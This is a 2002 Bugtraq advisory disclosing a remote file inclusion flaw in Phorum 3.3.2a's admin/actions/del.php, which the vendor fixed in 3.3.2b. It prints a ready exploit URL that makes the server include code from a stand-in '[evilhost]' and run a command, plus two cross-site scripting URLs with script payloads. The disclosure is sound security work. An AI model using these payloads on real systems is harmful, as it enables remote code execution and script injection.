Bugtraq mailing list archives
Phorum 3.3.2a has another bug for remote command execution
From: "Markus Arndt" <markus-arndt () web de>
Date: Sat, 18 May 2002 12:32:56 +0200
Target: Phorum 3.3.2a (maybee older) Description: Phorum 3.3.2a let's remote users execute arbitary code Found by: Markus Arndt<markus-arndt () web de> Vendor: http://www.phorum.org Notified Vendor: Yes, already fixed in 3.3.2b Details: Another bug for remote command execution. This time it's admin/actions/del.php :) Some code: <?php require "$include_path/delete_message.php"; delete_messages($id); QueMessage("Message(s) $id and all children were deleted!<br>"); ?> The url to exploit the script would be: http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls That url will make the script include http://[evilhost]/delete_message.php GoGoGo and secure your boxes. :) One other thing before i forget: CSS-Attacks are possible on 2 files.. http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script> http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script> Markus Arndt<markus-arndt () web de> http://skka.de ________________________________________________________________ Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
Current thread:
- Phorum 3.3.2a has another bug for remote command execution Markus Arndt (May 18)